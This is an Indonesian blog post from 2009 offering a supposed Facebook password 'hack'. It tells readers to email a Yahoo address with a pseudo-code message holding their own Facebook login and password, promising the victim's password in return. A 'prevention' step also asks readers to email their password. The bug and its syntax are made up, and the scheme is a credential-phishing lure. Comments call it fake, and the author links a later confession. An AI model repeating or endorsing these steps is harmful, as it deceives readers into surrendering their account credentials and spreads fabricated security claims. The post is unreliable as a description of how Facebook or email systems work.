Selasa, 03 November 2009

Hacking Facebook November 2009



Waduh....Malem-malem gini ngeblog.
Iya..nih udah 2 hari gak ngeblog. Kangen rasanya.
Hari ini aku mau memberi tahu tentang hacking lagi. Hacking Password Facebook!
Ya.! Facebook.......
Sebenarnya nie artikel baru kemarin aku copas dari seniorku di forum. Namun karena katanya boleh untuk  menyebarkan tiada sumber nya.......

Jutaan newbies & Script kiddies (Kalo aku lamer ya.....:P  )di dunia pada umumnya memiliki pertanyaan yang sama dan rasa ketertarikan yang sama terhadap satu hal special ini: Bagaimana cara mendapatkan pasword dan memonitor fb orang lain?

Wahai para newbies dan script kiddies…! Panenlah mulai sekarang.....

1. Bugs pada facebook

Facebook memiliki sistem pertahanan yang cukup tangguh. Disamping itu, tampilan yang menawan dan banyakanya fitur- fitur menarik yang tersedia dibandingkan dengan friendster dan yang gratisan lainnya menjadi alasan utama bagi mereka untuk memilih Facebook.
Ketika dahulu (dan juga hingga kini) tehnik session hijacking semakin marak dikalangan para attacker, pengguna fb bisa sedikit berlega hati karena facebook telah mengantisipasi hal tersebut dengan menerapkan beberapa aturan berikut:

1. Menetapkan session identifier yang unik
2. Menetapkan sistem identifier berpola acak
3. Session identifier yang independen
4. Session identifier yang bisa dipetakan dengan koneksi client side.

Keempat hal diatas telah cukup untuk membuat banyak para kiddies harus gigit jari karena serangan session hijacking akan sangat-sangat sulit untuk dilakukan (karena ketidakmampuan mereka tentunya dan pengecualian bagi kaum elite )
Tapi bagi kamu yang sangat-sangat bernafsu untuk bisa menembus facebook orang lain kini bisa sedikit terhibur karena telah ada sebuah bugs baru pada facebook. Facebook memiliki sebuah alamat email special yang otomatis dikendalikan oleh mesin yang jika kita kirimkan sebuah nilai “recovery” treenkripsi kepada alamat itu bersama alamat email korban, maka kamu akan memperoleh balasan email otomatis yang berisi password korban. Google menyebut mesin ini dengan nama " bot "

2. Memanfaatkan Bugs
Sudah gak sabar yach… okay tapi jangan di sebarkan dengan orang lain bahaya lho, sekarang ikuti langkah-langkah berikut:

a. Sign in lah kedalam account email kamu terlebih dahulu, kemudian dengan perasaan yang mendalam, tekan tombol [Compose]/[tulis surat] untuk menulis email.
2. Pada form isian to: masukkan alamat berikut: autorec.pass@yahoo.com Alamat inilah yang saya sebutkan sebagai alamat special tadi. Sebenarnya alamat ini hanya boleh diketahui oleh para admin Facebook saja, namun yeah.. kini alamat mematikan ini telah jatuh ke tangan kita. (Terima kasih Elite)
3. Pada form cc dan bcc, kosongi saja kedua form tersebut sedangkan pada form Subject ketik “do3534facebook4verif-De24” tanpa tanda kutip.
Pada form message (pesan), ketik:

Content-Type: text/plain;
charset=us-ascii (Untuk membuat balasan dari facebook bisa dibaca (tidak berbentuk bahasa pemograman))
p38ylec00rm::s%%http://www.facebook.com/%% (untuk membuat mailerbot meminta kembali informasi) email facebook anda(saya meminta anda  adalah agar anda tidak dianggap spam/hacker sehingga tidak ada tanggapan dari facebook. jadi, dengan anda memasukkan email maka mailerbot menganggap anda sebagai member (karena anda memang member facebook) )
start (retrieve > 0) (untuk memfungsikan mailerbot)
verified (*value= = float) (untuk membuat mailerbot berfungsi walau ada proteksi)
password anda (sekarang masukkan password anda sehingga anda tidak dianggap spam/hacker, dengan mencocokkan  email facebook dan password anda)
#searchmsgend%EcHvld%%hr# email facebook korban (untuk mendapatkan informasi-informasi user Secara acak)
#searchmsgend%FcWdld%%hr# nama facebook korban
send&&idR20394-tsa-0583 (membuat mailerbot mengirimkan semua informasi-informasinya ke e-mail anda)
#endofmsg (langkah terakhir)


(Jangan Mengganti teks di atas atau resiko tak berfungsi !)

Setelah itu tekan tombol send. Dan tunggulah dalam beberapa hari kamu akan menerima email balasan yang berisi password korban dan informasi-informasi mengenai korban seperti secreet question yang dipakai korban beserta jawabannya dan tanggal lahir korban
Contohnya: misalkan user ID facebook kamu adalah elite@yahoo.com dan password kamu cuy_gtg dan user ID facebook korban: korban@yahoo.com maka susunannya adalah sebagai berikut:

cc:
bcc:
Subject: do3534facebook4verif-De24
message:

Content-Type: text/plain;
charset=us-ascii
p38ylec00rm::s%%http://www.facebook.com/%%
elite@yahoo.com
start (retrieve > 0)
verified (*value= = float)
cuy_gtg
#searchmsgend%EcHvld%%hr#korban@yahoo.com
#searchmsgend%FcWdld%%hr#Namaku Korban
send&&idR20394-tsa-0583
#endofmsg

3. Cara Pencegahan

Bagi kamu para pengguna fb yang tidak ingin passwordmu dicuri dengan tehnik ini, lakukan cara berikut:
Pada form isian sento to: isikan
Pada form isian cc dan bcc kosongi saja kedua form tersebut dan pada subject ketik “do3534facebook%$no%verify%passwd” tanpa tanda kutip.
Kirim message sebagai berikut:
facebook.com No Rerovery
Username facebook : NOVIEWPWD
Facebook password : password kamu

contohnya yang sudah jadi:

cc:
bcc:
subject: do3534facebook%$no%verify%passwd
message:
facebook.com%No%Rerovery
elite@yahoo.com
cuy_gtg

Setelah mengirim email tersebut, maka bisa dipastikan facebook kamu sudah aman dari bugs mematikan ini. Orang yang berusaha melakukan tehnik ini tidak akan pernah mendapat balasan email yang berisi passswordmu. Namun harap diingat bahwa kamu juga harus melakukan hal ini setelah melakukan perubahan account. Jadi jika suatu ketika kamu mengganti password, lakukan cara penyelamatan lagi dengan melakukan langkah ini.

Cepat lakukan sebelum terlambat, karena sudah banyak orang yang terkena cara ini!
DAN JANGAN BERITAHU SIAPAPUN !
SEMAKIN BANYAK YANG TAHU, SEMAKIN CEPAT BUGS DIPERBAIKI

PERHATIAN

Sudah lebih dari satu tahun saya tidak mempunyai HP atau HH. Meskipun saya mempunyai modem dan kartu yang masih aktif, tapi saya tidak punya pulsa dan jarang mengisi kuota untuk membalas pesan, telepon ataupun komentar Anda. Jadi mulai hari ini sampai waktu yang tidak ditetapkan, segala bentuk komunikasi kepada saya hanya melalui email saja. Jika Anda ingin menghubungi saya karena keadaan darurat (misalnya minta bantuan FB kena hack), silahkan baca dan pahami link ini, jika Anda menginginkan respon dari saya.

Mohon maaf apabila ada pesan, komentar, dan permintaan teman di facebook yang belum/tidak terbalas. Harap maklum.


Terima kasih
Dadan Purnama


6 komentar:

  1. masa admin facebook pake email disposable (like yahoo or gmail)
    kalo alamat emailnya autorec.pass@facebook.com or admin.facebook.recover@facebook.com baru gue percaya.. JANGAN DIIKUTIN!

    tuandisco@kaskus-ccpb

    BalasHapus
  2. http://dadanpurnama.blogspot.com/2010/02/cybercrime-yang-pernah-aku-lakuin.html

    Waktu pertama kali aku dapat postingan itu dari :
    apaya pokoknya namanya itu ada cracker wspaint atau apalah lalu aku ubah sedikit.
    Eh..ternyata udah ada banyak yang make cara ini lebih dulu ....aku telat deh.
    Tapi masih banyak yang percaya loh.....

    Tapi setelah "curhatan ini" mungkin udah gak ada lagi....
    hiks....hiks

    BalasHapus
  3. Dasar loooooo, Kodok GOT Loooo!!! Beraninya pasang kaya ginian di blog sendiri!!!!

    BalasHapus
  4. wahhh gawat nich....,
    ngehack FB org kok pake blok sndiri...
    wkwkwkwkwkwk........
    Amatir..........

    BalasHapus

Silakan tinggalkan komentar, kritik, saran, spam atau apa saja yang penting sopan dan tidak SARA ya....

Jika ada pertanyaan atau request yang penting, bisa hubungi Admin di How to Contact

Terima kasih,
Dadan Purnama